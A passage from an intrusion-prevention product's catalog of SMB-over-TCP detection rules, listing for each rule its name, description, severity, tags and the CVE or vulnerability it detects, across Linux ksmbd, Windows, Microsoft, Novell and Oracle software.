Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ksmbd, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Vulnerability: Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Linux Kernel detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ksmbd, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1709-5242
Last changed: sgpkg-ips-1709-5242
Vulnerability: Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ksmbd detected.
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2022, Linux not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2023, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2023, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1603-5242
Vulnerability: Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2022, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in ksmbd detected.
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2023, Linux not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow
Description:
Back to top

SMB-TCP_Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-754-5211
Vulnerability: Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2012-01, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-433-4219
Last changed: sgpkg-ips-433-4219
Vulnerability: Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
Description:
Back to top

SMB-TCP_Microsoft-Office-Groove-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Office Groove detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Groove 2007, MS2011-03, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-Office-Groove-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_Microsoft-Remote-Administration-Protocol-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Microsoft Remote Administration Protocol detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows XP, Any Hardware, MS2012-08, CVE2012, Windows XP not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Microsoft-Remote-Administration-Protocol-Heap-Overflow-Vulnerability
Microsoft-Remote-Administration-Protocol-Stack-Overflow-Vulnerability
Description:
Back to top

SMB-TCP_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow

About this situation: Access to vulnerable function in Microsoft SQL Server detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, MS2009-02, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-207-2032
Vulnerability: MSSQL-MS-SQL-Server-Sp_replwritetovarbin-BOF
Description:
Back to top

SMB-TCP_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

About this situation: Detects attempts to execute operating system commands via xp_cmdshell
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server, Windows 2000 not specific, Windows NT 4.0 not specific, Microsoft SQL Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Description:
Back to top

SMB-TCP_Microsoft-SRV.SYS-Pipe-Transaction-No-Null-DoS

About this situation: Detects possible DOS against Microsoft Windows via a crafted SMB packet
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP1, Windows XP SP2, x86, MS2006-10, CVE2006, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-675-5211
Last changed: sgpkg-ips-675-5211
Vulnerability: Microsoft-Windows-Server-Driver-Crafted-SMB-Packet-DoS
Description:
Back to top

SMB-TCP_Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-398-4219
Last changed: sgpkg-ips-398-4219
Vulnerability: Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868
Description:
Back to top

SMB-TCP_Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1545-5242
Last changed: sgpkg-ips-1545-5242
Vulnerability: Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
Description:
Back to top

SMB-TCP_Microsoft-Windows-DVR-MS-CVE-2011-0042

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows XP, Windows Vista, Windows 7, Windows 2008 R2, Any Hardware, MS2011-03, CVE2011, Windows XP not specific, Windows Vista not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Microsoft-Windows-DVR-MS-CVE-2011-0042
Description:
Back to top

SMB-TCP_Microsoft-Windows-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-09, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Microsoft-Windows-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519

About this situation: An attempt to exploit a vulnerability in Microsoft Windows .NET detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2012-11, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
Description:
Back to top

SMB-TCP_Microsoft-Windows-Internet-Printing-Service-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-10, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-Internet-Printing-Service-Integer-Overflow
Description:
Back to top

SMB-TCP_Microsoft-Windows-Media-Center-MCL-File-Code-Execution

About this situation: An attempt to exploit a vulnerability in Windows Media Center detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 8, Any Hardware, MS2015-09, CVE2015, Windows Vista not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: Microsoft-Windows-Media-Center-MCL-File-Code-Execution
Description:
Back to top

SMB-TCP_Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2021, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
Description:
Back to top

SMB-TCP_Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-06, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-437-4219
Vulnerability: Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228
Description:
Back to top

SMB-TCP_Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-12, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Vulnerability: Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access
Description:
Back to top

SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet

About this situation: Detects possible DOS against Microsoft Windows via a crafted SMB packet
Context: TCP SMB Client Stream
Severity: 2
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP1, Windows XP SP2, x86, MS2006-10, CVE2006, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: Microsoft-Windows-Server-Driver-Crafted-SMB-Packet-DoS
Description:
Back to top

SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet-DOS

About this situation: Detects possible DOS against Microsoft Windows via a crafted SMB packet
Context: TCP SMB Client Stream
Severity: 2
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP1, Windows XP SP2, x86, MS2006-10, CVE2006, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Windows-Server-Driver-Crafted-SMB-Packet-DoS
Description:
Back to top

SMB-TCP_Microsoft-Windows-Server-Service-Authorization-Weakness

About this situation: An attempt to exploit a vulnerability in the Server Service of Microsoft Windows detected.
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, CVE2022, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1545-5242
Vulnerability: Microsoft-Windows-Server-Service-Authorization-Weakness
Description:
Back to top

SMB-TCP_Microsoft-Windows-Shell-File-Name-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-07, CVE2012, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Microsoft-Windows-Shell-File-Name-Code-Execution
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2008-11, CVE2008, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Client-Pool-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2010-02, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-281-4219
Vulnerability: Microsoft-Windows-SMB-Client-Pool-Corruption
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Client-Race-Condition

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-02, CVE2010, Windows Vista not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-287-4219
Last changed: sgpkg-ips-287-4219
Vulnerability: Microsoft-Windows-SMB-Client-Race-Condition
Description:
Back to top

SMB-TCP_Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-04, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Windows-Smb-Client-Response-Parsing-Memory-Corruption
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Client-Transaction-BOF-Exploit-CVE-2010-0270

About this situation: An exploit against CVE-2010-0270 detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows 7, Windows 2008, Any Hardware, MS2010-04, CVE2010, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-302-4219
Last changed: sgpkg-ips-514-5211
Vulnerability: Microsoft-Windows-SMB-Client-Transaction-BOF-CVE-2010-0270
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Response-Handling-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows 2003 SP0, Windows XP SP1, Windows XP SP0, Windows XP SP2, Any Hardware, MS2005-02, CVE2005, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: MS-Windows-SMB-Transaction-BOF-MS05-011
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Search-Request-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-10, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Microsoft-Windows-SMB-Search-Request-Buffer-Overflow
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022

About this situation: An attempt to exploit a denial of service vulnerability in Microsoft Windows SMB server detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-283-4219
Last changed: sgpkg-ips-285-4219
Vulnerability: Microsoft-Windows-SMB-Server-Denial-Of-Service-CVE-2010-0022
Description:
Back to top

SMB-TCP_Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-920-5242
Last changed: sgpkg-ips-920-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-931-5242
Vulnerability: Microsoft-Windows-SMB-Server-Smbv1-CVE-2017-0145-Buffer-Overflow
Description:
Back to top

SMB-TCP_Microsoft-Windows-SMBv3-Compression-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-06, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Microsoft-Windows-SMBv3-Compression-Information-Disclosure
Description:
Back to top

SMB-TCP_Microsoft-Windows-Vulnerability-CVE-2020-17140

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-12, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1301-5242
Last changed: sgpkg-ips-1301-5242
Vulnerability: Microsoft-Windows-Vulnerability-CVE-2020-17140
Description:
Back to top

SMB-TCP_Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-11, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-492-5211
Vulnerability: Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading
Microsoft-Windows-Mail-Remote-Code-Execution-CVE-2011-2016
Description:
Back to top

SMB-TCP_Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703
Description:
Back to top

SMB-TCP_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2020-06, CVE2020, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301
Description:
Back to top

SMB-TCP_Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-03, CVE2020, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1230-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796
Description:
Back to top

SMB-TCP_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_MS-Windows-Print-Spooler-Service-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: TCP SMB Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-08, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-470-5211
Vulnerability: MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
Description:
Back to top

SMB-TCP_Negotiate-Protocol-Smb2-Remote-Code-Execution

About this situation: Detects SMB2 exploits against Windows Vista, 7 and 2008
Context: TCP SMB Client Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-243-3038
Last changed: sgpkg-ips-244-3038
Vulnerability: Microsoft-Windows-SMB-Negotiate-Request-Remote-Code-Execution
Description:
Back to top

SMB-TCP_Novell-Client-NetIdentity-Agent-Pointer-Dereference-Exploit

About this situation: An exploit against a code execution vulnerability in Novell Client NetIdentity Agent detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Novell NetIdentity Agent, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-471-5211
Vulnerability: Novell-Client-NetIdentity-Agent-Pointer-Dereference-Code-Execution
Description:
Back to top

SMB-TCP_Novell-NetWare-CIFS.NLM-Buffer-Overflow

About this situation: An attempt to exploit a Novell NetWare CIFS.NLM Buffer Overflow vulnerability detected.
Context: TCP SMB Client Stream
Severity: 7
Tags: Novell NetWare, Any Hardware, Novell NetWare CIFS, CVE2005, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-813-5242
Vulnerability: Novell-NetWare-CIFS.NLM-Buffer-Overflow
Description:
Back to top

SMB-TCP_Oracle-Database-DBMS-Assert-Filter-Bypass

About this situation: Detects SQL injection attacks against the Oracle Database Server dbms_assert package
Context: TCP SMB Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-DBMS-Assert-Filter-Bypass
Description:
Back to top

SMB-TCP_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation

About this situation: Usage of DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA, possible Oracle privilege escalation
Context: TCP SMB Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, Oracle 10g, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-361-4219
Vulnerability: Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Description:
Back to top

SMB-TCP_Oracle-Database-Server-SQL-Query-Directory-Traversal

About this situation: Detects directory traversal exploits against Oracle Database Server
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-Server-SQL-Query-Directory-Traversal
Description:
Back to top

SMB-TCP_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection

About this situation: Detects SQL Injection attacks against the Oracle Database Server SYS.KUPW$WORKER package
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Database, CVE2006, Any Operating System not specific, Oracle Database not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Description:
Back to top

SMB-TCP_Oracle-Sys-Pbsde-Init-BOF

About this situation: Buffer overflow vulnerability in Oracle sys.pbsde.init stored procedure
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle 9i, Oracle 10g, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-148-2032
